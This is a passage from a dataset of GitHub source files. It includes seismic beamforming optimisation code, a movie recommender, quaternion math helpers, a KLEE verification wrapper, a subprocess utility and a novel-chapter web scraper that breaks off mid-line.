calcStreamMapshifted= calcStreamMap.copy()\n for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n event = model.Event(lat=float(ev.lat), lon=float(ev.lon), depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n bf = BeamForming(stations, traces, normalize=True)\n shifted_traces = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(directory, 'array_center.pf'),\n fn_beam=pjoin(directory, 'beam.mseed'))\n i = 0\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n weight = analyse(shifted_traces, engine, event, stations,\n 100., store_id, nwindows=1,\n check_events=True, phase_def='P')\n\n for trace in calcStreamMap.keys():\n recordstarttime = calcStreamMap[trace].stats.starttime\n d = calcStreamMap[trace].stats.starttime\n d = d.timestamp\n\n if calcStreamMap[trace].stats.npts < minSampleCount:\n minSampleCount = calcStreamMap[trace].stats.npts\n\n ############################################################################\n traces = num.ndarray (shape=(len(calcStreamMap), minSampleCount), dtype=float)\n traveltime = num.ndarray (shape=(len(calcStreamMap), dimX*dimY), dtype=float)\n latv = num.ndarray (dimX*dimY, dtype=float)\n lonv = num.ndarray (dimX*dimY, dtype=float)\n ############################################################################\n\n\n c=0\n streamCounter = 0\n\n for key in calcStreamMap.keys():\n streamID = key\n c2 = 0\n\n for o in calcStreamMap[key]:\n if c2 < minSampleCount:\n traces[c][c2] = o\n\n c2 += 1\n\n\n for key in TTTGridMap.keys():\n\n if streamID == key:\n traveltimes[streamCounter] = TTTGridMap[key]\n else:\n \"NEIN\", streamID, key\n\n\n if not streamCounter in traveltimes :\n continue #hs : thread crashed before\n\n g = traveltimes[streamCounter]\n dimZ = g.dimZ\n mint = g.mint\n maxt = g.maxt\n Latul = g.Latul\n Lonul = g.Lonul\n Lator = g.Lator\n Lonor = g.Lonor\n\n gridElem = g.GridArray\n\n for x in range(dimX):\n for y in range(dimY):\n elem = gridElem[x, y]\n\n traveltime [c][x * dimY + y] = elem.tt\n latv [x * dimY + y] = elem.lat\n lonv [x * dimY + y] = elem.lon\n #endfor\n\n c += 1\n streamCounter += 1\n\n #endfor\n\n\n ############################## CALCULATE PARAMETER FOR SEMBLANCE CALCULATION ##################\n nsamp = winlen * new_frequence\n\n nstep = int (step*new_frequence)\n migpoints = dimX * dimY\n\n dimZ = 0\n new_frequence = cfg.newFrequency () # ['new_frequence']\n maxp = int (Config['ncore'])\n\n\n Logfile.add ('PROCESS %d NTIMES: %d' % (flag,ntimes))\n\n if False :\n print ('nostat ',nostat,type(nostat))\n print ('nsamp ',nsamp,type(nsamp))\n print ('ntimes ',ntimes,type(ntimes))\n print ('nstep ',nstep,type(nstep))\n print ('dimX ',dimX,type(dimX))\n print ('dimY ',dimY,type(dimY))\n print ('mint ',Gmint,type(mint))\n print ('new_freq ',new_frequence,type(new_frequence))\n print ('minSampleCount ',minSampleCount,type(minSampleCount))\n print ('latv ',latv,type(latv))\n print ('traces',traces,type(traces))\n print ('traveltime',traveltime,type(traveltime))\n\n\n#==================================semblance calculation========================================\n\n t1 = time.time()\n traces = traces.reshape (1,nostat*minSampleCount)\n traveltime = traveltime.reshape (1,nostat*dimX*dimY)\n USE_C_CODE = True\n try:\n if USE_C_CODE :\n import Cm\n import CTrig\n start_time = time.time()\n k = Cm.otest (maxp,nostat,nsamp,ntimes,nstep,dimX,dimY,Gmint,new_frequence,\n minSampleCount,latv,lonv,traveltime,traces)\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n else :\n start_time = time.time()\n k = otest (maxp,nostat,nsamp,ntimes,nstep,dimX,dimY,Gmint,new_frequence,\n minSampleCount,latv,lonv,traveltime,traces) #hs\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n except:\n print(\"loaded tttgrid has probably wrong dimensions or stations, delete\\\n ttgrid or exchange\")\n\n t2 = time.time()\n\n\n partSemb = k\n\n partSemb_syn = partSemb.reshape (ntimes,migpoints)\n\n\n return partSemb_syn\n\ndef optimization(*params, **args):\n counter = params[1]\n Config = params[2]\n Wdf = params[3]\n FilterMeta = params[4]\n mint = params[5]\n maxt = params[6]\n TTTGridMap = params[7]\n Folder = params[8]\n Origin = params[9]\n ntimes = params[10]\n switch = params[11]\n ev = params[12]\n arrayfolder = params[13]\n syn_in = params[14]\n data = params[15]\n evpath = params[16]\n XDict = params[17]\n RefDict = params[18]\n workdepth = params[19]\n filterindex = params[20]\n Wdfs = params[21]\n\n networks = Config['networks'].split(',')\n params = num.asarray(params)\n parameter = num.ndarray.tolist(params)\n ASL_syn = []\n\n\n C = config.Config (evpath)\n Config = C.parseConfig ('config')\n cfg = ConfigObj (dict=Config)\n if cfg.pyrocko_download() == True:\n Meta = C.readpyrockostations()#\n\n elif cfg.colesseo_input() == True:\n scenario = guts.load(filename=cfg.colosseo_scenario_yml())\n scenario_path = cfg.colosseo_scenario_yml()[:-12]\n Meta = C.readcolosseostations(scenario_path)\n else:\n Meta = C.readMetaInfoFile()\n l = 0\n for i in networks:\n\n arrayname = i\n arrayfolder = os.path.join (Folder['semb'],arrayname)\n\n network = Config[i].split('|')\n\n FilterMeta = ttt.filterStations (Meta,Config,Origin,network)\n\n if len(FilterMeta) < 3: continue\n\n W = XDict[i]\n refshift = RefDict[i]\n\n FilterMeta = cmpFilterMetavsXCORR (W, FilterMeta)\n\n Logfile.add ('BOUNDING BOX DIMX: %s DIMY: %s GRIDSPACING: %s \\n'\n % (Config['dimx'],Config['dimy'],Config['gridspacing']))\n\n f = open('../tttgrid/tttgrid_%s_%s_%s.pkl' % (ev.time, arrayname, workdepth), 'rb')\n TTTGridMap,mint,maxt = pickle.load(f)\n f.close()\n\n\n switch = filterindex\n\n tw = times.calculateTimeWindows (mint,maxt,Config,ev, switch)\n Wdf = Wdfs[l]\n semb_syn = doCalc_syn (counter,Config,Wdf,FilterMeta,mint,maxt,TTTGridMap,\n Folder,Origin,ntimes,switch, ev,arrayfolder, syn_in,\n parameter[0])\n ASL_syn.append(semb_syn)\n counter += 1\n l += 1\n\n sembmax_syn = sembCalc.collectSemb(ASL_syn,Config,Origin,Folder,ntimes,len(networks),switch)\n\n misfit_list = [] # init a list for a all the singular misfits\n norm_list = [] # init a list for a all the singular normalizations\n taper = trace.CosFader(xfade=2.0) # Cosine taper with fade in and out of 2s.\n bw_filter = trace.ButterworthResponse(corner=0.000055, # in Hz\n order=4,\n type='high') # \"low\"pass or \"high\"pass\n setup = trace.MisfitSetup(description='Misfit Setup',\n norm=2, # L1 or L2 norm\n taper=taper,\n filter=bw_filter,\n domain='time_domain')\n nsamples = len(data)\n tmin = util.str_to_time('2010-02-20 15:15:30.100')\n tr = trace.Trace(station='TEST', channel='Z',\n deltat=0.5, tmin=tmin, ydata=data)\n syn = trace.Trace(station='TEST', channel='Z',\n deltat=0.5, tmin=tmin, ydata=sembmax_syn)\n misfit, norm = tr.misfit(candidate=syn, setup=setup) # calculate the misfit of a single observed trace with its synthetics\n # with the setup from above\n misfit_list.append(misfit), norm_list.append(norm) # append the misfit into a list\n global_misfit_normed = num.sqrt(num.nansum((num.asarray(misfit_list))**2) / # sum all the misfits and normalize to get a single minimizable value\n num.nansum((num.asarray(norm_list))**2))\n return global_misfit_normed\n\n\ndef solve(counter,Config,Wdf,FilterMeta,mint,maxt,TTTGridMap,\n Folder,Origin,ntimes,switch, ev,arrayfolder,\n syn_in, ASL_d, sembmax_d, evpath, XDict,\n RefDict, workdepth, filterindex, Wdfs):\n import scipy\n t = time.time() # start timing\n # bounds given as (min,max)\n\n bounds = ((syn_in.mag_0_low(), syn_in.mag_0_high()), # magnitude\n (syn_in.strike_0_low(), syn_in.strike_0_high()), # strike [deg.]\n (syn_in.dip_0_low(), syn_in.dip_0_high()), # dip [deg.]\n (syn_in.rake_0_low(), syn_in.rake_0_high()), # rake [deg.]\n (syn_in.depth_0_low()*km, syn_in.depth_0_high()*km), # depth [km]\n (syn_in.north_shift_0_low()*km, syn_in.north_shift_0_high()*km), # north shift from GCMT [km]\n (syn_in.east_shift_0_low()*km, syn_in.east_shift_0_high()*km), # east shift from GCMT [km]\n (syn_in.time_0_low(), syn_in.time_0_high())) # timeshift from GCMT [s]\n # optimize.differential_evolution of scipy is used for the optim.\n # Differential Evolution is stochastic in nature (does not use gradient methods)\n #to find the minimium, and can search large areas of candidate space, but often requires\n #larger numbers of function evaluations than conventional gradient based techniques.\n # The scipy solver can easily be exchanged.\n\n data = sembmax_d\n result = scipy.optimize.differential_evolution(optimization, bounds=bounds, maxiter=3, popsize=3, args=(counter,Config,Wdf,FilterMeta,mint,maxt,TTTGridMap,\n Folder,Origin,ntimes,switch, ev,arrayfolder, syn_in, data, evpath, XDict, RefDict, workdepth, filterindex, Wdfs))\n elapsed = time.time() - t # get the processing time\n print(result.x)\n","repo_name":"braunfuss/Palantiri","sub_path":"src/process/optim_csemb.py","file_name":"optim_csemb.py","file_ext":"py","file_size_in_byte":47195,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"34806688792","text":"print(\"line1 main\")\nfrom EmgReader import *\nfrom ActionSender import *\nfrom Transformer import *\nfrom EmgController import *\n\nprint(\"line7 main\")\nemgReader = Adc('ads1115')\nactionSender = ActionSender()\nconfigPath = 'config.ini'\ntransformer = Transformer(configPath, emgReader)\n\n\nprint(\"line14 main\")\ne = EmgController(actionSender, transformer)\ncounter = 0\nwhile True:\n if counter == 100:\n counter = 0\n print(\"while true\")\n e.getNewAction()\n counter += 1\n","repo_name":"Sabrowna/EmgAnalyser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34974574279","text":"# Otis Scott\n# CS - UY 1114\n# 10 Oct 2018\n# Homework 5\n\nneedle = input(\"Enter needle: \")\nhaystack = input(\"Enter haystack: \")\nposition = -1\nfor each in range(0, len(haystack) + 1 - len(needle)):\n if haystack[each:each + len(needle)] == needle:\n position = each\n break\n\nif position == -1:\n print(\"Needle not found in haystack\")\nelse:\n print(\"Needle found in haystack at position \" + str(position))\n","repo_name":"otisscott/1114-Stuff","sub_path":"Homework 5/oms275_hw5_q7.py","file_name":"oms275_hw5_q7.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20426091298","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pickle \r\n\r\nmovies = pd.read_csv('movies.csv')\r\n\r\n\r\n\r\n# Make a census of the genre keywords\r\ngenre_labels = set()\r\nfor s in movies['genres'].str.split('|').values:\r\n genre_labels = genre_labels.union(set(s))\r\n\r\n# Function that counts the number of times each of the genre keywords appear\r\ndef count_word(dataset, ref_col, census):\r\n keyword_count = dict()\r\n for s in census: \r\n keyword_count[s] = 0\r\n for census_keywords in dataset[ref_col].str.split('|'): \r\n if type(census_keywords) == float and pd.isnull(census_keywords): \r\n continue \r\n for s in [s for s in census_keywords if s in census]: \r\n if pd.notnull(s): \r\n keyword_count[s] += 1\r\n #______________________________________________________________________\r\n # convert the dictionary in a list to sort the keywords by frequency\r\n keyword_occurences = []\r\n for k,v in keyword_count.items():\r\n keyword_occurences.append([k,v])\r\n keyword_occurences.sort(key = lambda x:x[1], reverse = True)\r\n return keyword_occurences, keyword_count\r\n\r\n# Calling this function gives access to a list of genre keywords which are sorted by decreasing frequency\r\nkeyword_occurences, dum = count_word(movies, 'genres', genre_labels)\r\n\r\n\r\n# Break up the big genre string into a string array\r\nmovies['genres'] = movies['genres'].str.split('|')\r\n# Convert genres to string value\r\nmovies['genres'] = movies['genres'].fillna(\"\").astype('str')\r\n\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\ntf = TfidfVectorizer(analyzer='word',ngram_range=(1, 2),min_df=0, stop_words='english')\r\ntfidf_matrix = tf.fit_transform(movies['genres'])\r\n#tfidf_matrix.shape\r\n\r\nfrom sklearn.metrics.pairwise import linear_kernel\r\ncosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\r\n#cosine_sim[:4, :4]\r\n\r\n# Build a 1-dimensional array with movie titles\r\ntitles = movies['title']\r\nindices = pd.Series(movies.index, index=movies['title'])\r\n\r\n# Function that get movie recommendations based on the cosine similarity score of movie genres\r\ndef genre_recommendations(title):\r\n idx = indices[title]\r\n sim_scores = list(enumerate(cosine_sim[idx]))\r\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\r\n sim_scores = sim_scores[1:21]\r\n movie_indices = [i[0] for i in sim_scores]\r\n return titles.iloc[movie_indices]\r\n\r\n#recomm = genre_recommendations('Good Will Hunting (1997)')\r\nrecomm = genre_recommendations('Othello (1995)')\r\n\r\npickle.dump(recomm,open('model.pkl','wb'))\r\n\r\n\r\nmodel=pickle.load(open('model.pkl','rb'))\r\n\r\n#recomm = model.load(model)\r\n\r\n#recomm1 = model.genre_recommendation('Good Will Hunting (1997)')","repo_name":"thakkarrahul01/movie-recommender","sub_path":"movies_recommender.py","file_name":"movies_recommender.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35321657012","text":"import math\n\n\ndef polysum(n, s):\n '''given number of sides (n) and edge length (s),\n return the sum of area and perimeter**2 rounded to 4 decimal places'''\n area = n * s * s / math.tan(math.pi / n) / 4.0\n perimeter = n * s\n return round(area + perimeter**2, 4)\n\nif __name__ == '__main__':\n assert polysum(4, 1) == 17\n","repo_name":"qpxu007/python-snippets","sub_path":"checkio/polysum.py","file_name":"polysum.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"479768263","text":"import math\r\nimport numpy as np\r\n\r\n# --- Helper Functions ----\r\n\r\n\r\n# Deg/s -> Rad/s\r\ndef convert_deg_to_rads(X, Y, Z):\r\n \"\"\"\r\n Converts all values in 3 lists in radian equivalent\r\n :param X: list X\r\n :param Y: list Y\r\n :param Z: list Z\r\n :return: lists XYZ w/ values converted into radians\r\n \"\"\"\r\n X = [math.radians(x) for x in X]\r\n Y = [math.radians(x) for x in Y]\r\n Z = [math.radians(x) for x in Z]\r\n return X, Y, Z\r\n\r\n\r\n# Normalize Vectors\r\ndef normalize(X, Y, Z):\r\n \"\"\"\r\n Normalizes 3 vectors, XYZ. In the case of a vector with 0 magnitude, to avoid NaN errors,\r\n the 0 vector is simply returned.\r\n :param X: list X\r\n :param Y: list Y\r\n :param Z: list Z\r\n :return: normalized vectors XYZ\r\n \"\"\"\r\n # Calculate magnitude of vectors\r\n mag_X = math.sqrt(sum([x ** 2 for x in X]))\r\n mag_Y = math.sqrt(sum([x ** 2 for x in Y]))\r\n mag_Z = math.sqrt(sum([x ** 2 for x in Z]))\r\n\r\n # Normalize vectors (handling 0 cases)\r\n if mag_X != 0:\r\n X = [x / mag_X for x in X]\r\n else:\r\n X = [0 for x in X]\r\n if mag_Y != 0:\r\n Y = [x / mag_Y for x in Y]\r\n else:\r\n Y = [0 for x in Y]\r\n if mag_Z != 0:\r\n Z = [x / mag_Z for x in Z]\r\n else:\r\n Z = [0 for x in Z]\r\n\r\n return X, Y, Z\r\n\r\n\r\n# Convert V & Theta angles to Quaternions\r\ndef v_theta_to_quaternion(v, theta):\r\n \"\"\"\r\n Converts normalized vector v and angle of rotation theta into quaternion format\r\n :param v: normalized 3d vector, v_x, v_y, v_z\r\n :param theta: angle of rotation, rads\r\n :return: quaternion equivalent of v, theta -> wxyz\r\n \"\"\"\r\n v_x, v_y, v_z = v[0], v[1], v[2]\r\n w = math.cos(theta / 2)\r\n x = v_x * math.sin(theta / 2)\r\n y = v_y * math.sin(theta / 2)\r\n z = v_z * math.sin(theta / 2)\r\n return w, x, y, z\r\n\r\n\r\n# Convert Euler Angle to Quaternion\r\ndef euler_to_quaternion(yaw, pitch, roll):\r\n \"\"\"\r\n Converts euler (yaw, pitch, roll) to quaternion equivalent (x, x, y, z)\r\n :param yaw: radians\r\n :param pitch: radians\r\n :param roll: radians\r\n :return: quaternion wxyz\r\n \"\"\"\r\n cy = math.cos(yaw * 0.5)\r\n sy = math.sin(yaw * 0.5)\r\n cp = math.cos(pitch * 0.5)\r\n sp = math.sin(pitch * 0.5)\r\n cr = math.cos(roll * 0.5)\r\n sr = math.sin(roll * 0.5)\r\n w = cy * cp * cr + sy * sp * sr\r\n x = cy * cp * sr - sy * sp * cr\r\n y = sy * cp * sr + cy * sp * cr\r\n z = sy * cp * cr - cy * sp * sr\r\n return w, x, y, z\r\n\r\n\r\n# Convert Quaternion to Euler (assumes quaternion is normalized)\r\ndef quaternion_to_euler(q):\r\n \"\"\"\r\n Converts quaternion wxyz into euler format xyz\r\n :param q: quaternion\r\n :return: euler representation, xyz\r\n \"\"\"\r\n W = q[0]\r\n X = q[1]\r\n Y = q[2]\r\n Z = q[3]\r\n\r\n # roll(x - axis rotation)\r\n sinr_cosp = +2.0 * (W * X + Y * Z)\r\n cosr_cosp = +1.0 - 2.0 * (X * X + Y * Y)\r\n roll = math.atan2(sinr_cosp, cosr_cosp)\r\n\r\n # pitch(y - axis rotation)\r\n sinp = +2.0 * (W * Y - Z * X)\r\n if abs(sinp) >= 1:\r\n pitch = np.copysign(math.pi / 2, sinp) # use 90 degrees if out of range\r\n else:\r\n pitch = math.asin(sinp)\r\n\r\n # yaw(z - axis rotation)\r\n siny_cosp = +2.0 * (W * Z + X * Y)\r\n cosy_cosp = +1.0 - 2.0 * (Y * Y + Z * Z)\r\n yaw = math.atan2(siny_cosp, cosy_cosp)\r\n\r\n return roll, pitch, yaw\r\n\r\n\r\n# Quaternion to conjugate (inverse rotation)\r\ndef quaternion_to_conjugate(q):\r\n \"\"\"\r\n Calculates conjugate of quaternion\r\n :param q: quaternion\r\n :return: quaternion conjugate\r\n \"\"\"\r\n # q = [s,v] | The conjugate, q* = [s, -v]\r\n return [q[0], -q[1], -q[2], -q[3]]\r\n\r\n\r\n# Quaternion Product A * B\r\ndef quaternion_product(q1, q2):\r\n \"\"\"\r\n Returns the quaternion product\r\n :param q1: quaternion q1\r\n :param q2: quaternion q2\r\n :return: quaternion product q1 * q2\r\n \"\"\"\r\n Wa = q1[0]\r\n Wb = q2[0]\r\n Xa = q1[1]\r\n Xb = q2[1]\r\n Ya = q1[2]\r\n Yb = q2[2]\r\n Za = q1[3]\r\n Zb = q2[3]\r\n x = Xa * Wb + Ya * Zb - Za * Yb + Wa * Xb\r\n y = -Xa * Zb + Ya * Wb + Za * Xb + Wa * Yb\r\n z = Xa * Yb - Ya * Xb + Za * Wb + Wa * Zb\r\n w = -Xa * Xb - Ya * Yb - Za * Zb + Wa * Wb\r\n return [w, x, y, z]\r\n\r\n\r\n# Calcs angle between two 3D vectors\r\ndef angle_between_vectors(u, v):\r\n \"\"\"\r\n Returns angle between two 3d vectors\r\n :param u: 3d vector\r\n :param v: 3d vector\r\n :return: angle between two vectors\r\n \"\"\"\r\n mag_u = math.sqrt(u[0]**2 + u[1]**2 + u[2]**2)\r\n mag_v = math.sqrt(v[0]**2 + v[1]**2 + v[2]**2)\r\n dot_prod = u[0] * v[0] + u[1] * v[1] + u[2] * v[2]\r\n return math.acos(dot_prod/(mag_u*mag_v))\r\n\r\n\r\n# Rotates xyz vector by quaternion wxyz\r\ndef point_rotation_by_quaternion(v, q):\r\n \"\"\"\r\n Rotates vector xyz by quaternion wxyz\r\n :param point: 3d vector xyz\r\n :param q: quaternionn wxyz\r\n :return: new orientation of vector xyz\r\n \"\"\"\r\n r = [0] + v\r\n q_conj = [q[0], -q[1], -q[2], -q[3]]\r\n return quaternion_product(quaternion_product(q, r), q_conj)[1:]\r\n\r\n","repo_name":"OGGraham/VR","sub_path":"helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7054980929","text":"# Problem No.: 13549\n# Solver: Jinmin Goh\n# Date: 20200417\n# URL: https://www.acmicpc.net/problem/13549\n\nimport sys\n\ndef main():\n n, k = map(int, input().split())\n if n >= k:\n print(n - k)\n return\n \n # 0-1 BFS\n deque = [n]\n cost = [None] * 100001\n cost[n] = 0\n while True:\n tempZero = []\n tempOne = []\n while deque:\n temp = deque.pop(0)\n if temp == k:\n print(cost[k])\n return\n if 2 * temp <= 100000 and cost[2 * temp] == None:\n cost[2 * temp] = cost[temp]\n tempZero.append(2 * temp)\n if temp + 1 <= 100000 and cost[temp + 1] == None:\n cost[temp + 1] = cost[temp] + 1\n tempOne.append(temp + 1)\n if temp - 1 >= 0 and cost[temp - 1] == None:\n cost[temp - 1] = cost[temp] + 1\n tempOne.append(temp - 1)\n deque = tempZero + tempOne\n\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/13549/13549.py","file_name":"13549.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4221017574","text":"import subprocess\nfrom colorama import Fore, Style\n\n\n# This class is used for verifying the functional equivalence of two pieces of code using KLEE, a symbolic execution engine.\nclass Verification:\n def __init__(self, compiler, ai):\n self.code = \"\" # The code to be tested\n # This prompt is used to generate a C++ application that can run two C++ functions with symbolic variables created by KLEE.\n # It will also check if they produce the same output (functional equivalence).\n self.generate_prompt = \"Your task is to create a C++ application to run two C++ functions with symbolic variables generated by KLEE and ensure they are functionally equivalent (i.e., the output is the same); you should use assert for the equivalence check. I will provide you with two C++ functions (original code and improved code; each might also have a main function that you may ignore), and you should only return the full code for an application (including the two functions, a wrapper function to call them with symbolic variables and check their equivalance, and a single main() function containing the code to generate symbolic variabels via KLEE) to be able to run KLEE. no text, please; give me the C++ code only. no extern C\"\n # This prompt is used to fix any errors reported by KLEE.\n self.verify_prompt = \"I got these errors from KLEE. Please fix all of them: \"\n self.compiler = compiler # The compiler to use\n self.ai = ai # The AI interface to use for generating and fixing the code\n\n # This method generates the verification code, checks if it is functionally equivalent to the original code, and if not, uses AI to fix it.\n def verify_and_fix(self, original_code, generated_code):\n if (self.code == ''):\n self.generate_code(original_code, generated_code)\n verified, error = self.se_verification()\n if not verified:\n print(Fore.RED + 'Verification Error: ' + Style.RESET_ALL + error)\n self.code = self.ai.submit_task(self.verify_prompt + error, self.code)\n self.verify_and_fix(original_code, generated_code)\n\n # This method generates the verification code.\n def generate_code(self, original_code, generated_code):\n prompt = self.generate_prompt + \"\\n\\\\original code\\n\" \\\n + original_code + \"\\n\\\\improved code\\n\" + generated_code\n print(Fore.YELLOW + \"Generating verification code...\" + Style.RESET_ALL)\n self.code = self.ai.submit_task(prompt, self.code)\n self.code = self.compiler.check_and_fix(self.code, None, 1, 'klee_code')\n\n # This method performs the symbolic execution verification using KLEE.\n def se_verification(self):\n klee_command = ['klee', 'klee_code.bc']\n print(Fore.YELLOW + \"Running KLEE...\" + Style.RESET_ALL)\n process = subprocess.run(klee_command, text=True, capture_output=True)\n if process.returncode != 0: # If there's a compilation error\n return False, process.stderr\n return True, None\n","repo_name":"aliireza/cai","sub_path":"cai/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22027730705","text":"from __future__ import annotations\n\nfrom pathlib import Path\nfrom subprocess import CalledProcessError\nfrom subprocess import PIPE\nfrom subprocess import run as subprocess_run\nfrom typing import Literal\nfrom typing import overload\n\nfrom devenv import constants\nfrom devenv.constants import home\nfrom devenv.constants import homebrew_bin\nfrom devenv.constants import root\nfrom devenv.constants import shell_path\nfrom devenv.constants import VOLTA_HOME\n\nbase_path = f\"{VOLTA_HOME}/bin:{homebrew_bin}:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:{root}/bin\"\nbase_env = {\n \"PATH\": base_path,\n \"HOME\": home,\n \"SHELL\": shell_path,\n \"VOLTA_HOME\": VOLTA_HOME,\n}\n\n\ndef quote(cmd: tuple[str, ...]) -> str:\n \"\"\"convert a command to bash-compatible form\"\"\"\n from pipes import quote\n\n return \" \".join(quote(arg) for arg in cmd)\n\n\ndef xtrace(cmd: tuple[str, ...]) -> None:\n \"\"\"Print a commandline, similar to how xtrace does.\"\"\"\n\n teal = \"\\033[36m\"\n reset = \"\\033[m\"\n bold = \"\\033[1m\"\n\n print(f\"+ {teal}${reset} {bold}{quote(cmd)}{reset}\")\n\n\n@overload\ndef run(\n cmd: tuple[str, ...],\n *,\n pathprepend: str = \"\",\n exit: bool = False,\n env: dict[str, str] | None = None,\n cwd: Path | str | None = None,\n stdout: Literal[False] = False,\n) -> None:\n ...\n\n\n@overload\ndef run(\n cmd: tuple[str, ...],\n *,\n pathprepend: str = \"\",\n exit: bool = False,\n env: dict[str, str] | None = None,\n cwd: Path | str | None = None,\n stdout: Literal[True],\n) -> str:\n ...\n\n\ndef run(\n cmd: tuple[str, ...],\n *,\n pathprepend: str = \"\",\n exit: bool = False,\n env: dict[str, str] | None = None,\n cwd: Path | str | None = None,\n stdout: bool = False,\n) -> str | None:\n _stdout = PIPE if stdout else None\n del stdout\n\n if env is None:\n env = {}\n env = {**constants.user_environ, **base_env, **env}\n\n if pathprepend:\n env[\"PATH\"] = f\"{pathprepend}:{env['PATH']}\"\n\n if constants.DEBUG:\n xtrace(cmd)\n try:\n proc = subprocess_run(cmd, check=True, stdout=_stdout, cwd=cwd, env=env)\n if _stdout:\n return proc.stdout.decode().strip()\n else:\n return None\n except FileNotFoundError as e:\n # This is reachable if the command isn't found.\n if exit:\n raise SystemExit(f\"{e}\") from None\n else:\n raise RuntimeError(f\"{e}\") from None\n except CalledProcessError as e:\n detail = f\"Command `{quote(e.cmd)}` failed! (code {e.returncode})\"\n if _stdout:\n detail += f\"\"\"\nstdout:\n{\"\" if e.stdout is None else e.stdout.decode()}\n\"\"\"\n if exit:\n raise SystemExit(detail) from None\n else:\n raise RuntimeError(detail) from None\n","repo_name":"getsentry/devenv","sub_path":"devenv/lib/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36235302062","text":"import re\nimport asyncio\nfrom urllib import parse\n\nfrom bs4 import BeautifulSoup\nfrom playwright.async_api import BrowserContext, async_playwright\nfrom utils import chineseNumber2Int, remove_title, txt_write\n\nweb_name = \"\"\n\n\ndef get_catalogue_url_list(catalogue_url, content, selector=\"div#list dd\"):\n catalogue_soup = BeautifulSoup(content, \"lxml\")\n # print(catalogue_soup)\n try:\n now_title = catalogue_soup.h1.string\n except AttributeError:\n now_title = input(\"获取小说名失败, 请手动输入:\")\n zhangjie_list = catalogue_soup.select(selector)\n print(f\"共获取到 {len(zhangjie_list)} 章小说链接\")\n for i in range(len(zhangjie_list)):\n relative_link = zhangjie_list[i].a[\"href\"]\n zhangjie_list[i] = parse.urljoin(catalogue_url, relative_link)\n return zhangjie_list, now_title\n\n\ndef get_novel_content(novel_page, novel_title, selector=\"div#content\"):\n novel_soup = BeautifulSoup(novel_page, \"lxml\")\n zhangjie_title = str(novel_soup.h1.string).strip()\n zhangjie_title_correct = re.compile(\"正文卷\")\n if re.match(zhangjie_title_correct, zhangjie_title):\n zhangjie_title = zhangjie_title[4:]\n num_pattern = re.compile(r\"^\\s?第?([0-9一二三四五六七八九十百千万亿零壹贰叁肆伍陆柒捌玖拾佰仟]+)[章张]{0,1}\")\n title_match = re.match(num_pattern, zhangjie_title)\n if title_match:\n raw_num = title_match.group(1)\n if not raw_num.isdecimal():\n raw_num = chineseNumber2Int(raw_num)\n zhangjie_num = f\"第{str(raw_num)}章\"\n zhangjie_title = zhangjie_title.replace(title_match.group(0), zhangjie_num)\n novel_content_tag_list = novel_soup.select(selector)\n if len(novel_content_tag_list) > 0:\n novel_content_tag = novel_soup.select(selector)[0]\n else:\n print(f\"{zhangjie_title} 不存在 {selector}\")\n print(novel_soup)\n return\n novel_content_tag = novel_soup.select(selector)[0]\n for extract_element in novel_content_tag.find_all(\"div\"):\n extract_element.extract()\n\n novel_text = novel_content_tag.get_text(\"\\n\\t\", strip=True)\n\n text_pattern = re.compile(\"(正在手打中,请稍等片刻,内容更新后,请重新刷新页面,即可获取最新更新!)|(网页版章节内容慢)\")\n if len(novel_text) < 400 and re.search(text_pattern, novel_text):\n print(f\"已跳过: {zhangjie_title}\")\n return\n\n novel_text += \"\\n\\n\"\n txt_write(novel_title + web_name, zhangjie_title, novel_text)\n\n\nasync def get_page_content(context: BrowserContext, url: str, wait_until: str = \"domcontentloaded\"):\n page = await context.new_page()\n for _ in range(5):\n try:\n resp = await page.goto(url, wait_until=wait_until)\n except TimeoutError:\n continue\n if resp.status == 200:\n break\n await asyncio.sleep(5.0)\n else:\n raise TimeoutError(f\"{url}获取失败\")\n content = await page.content()\n await page.close()\n return content\n\n\nasync def main(catalogue_url, start_num=0, catalogue_selector=\"div#list dd\", novel_selector=\"div#content\"):\n print(\"无头浏览器启动中\")\n p = await async_playwright().start()\n browser = await p.chromium.launch()\n # browser = p.chromium.launch(headless=False)\n context = await browser.new_context(\n java_script_enabled=True,\n user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 